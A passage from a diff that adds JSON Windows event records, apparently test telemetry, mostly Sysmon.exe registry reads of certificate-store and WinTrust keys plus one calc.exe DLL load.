"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573247610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "InputHost.dll", + "image_path": "C:\\Windows\\System32\\InputHost.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573246360000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 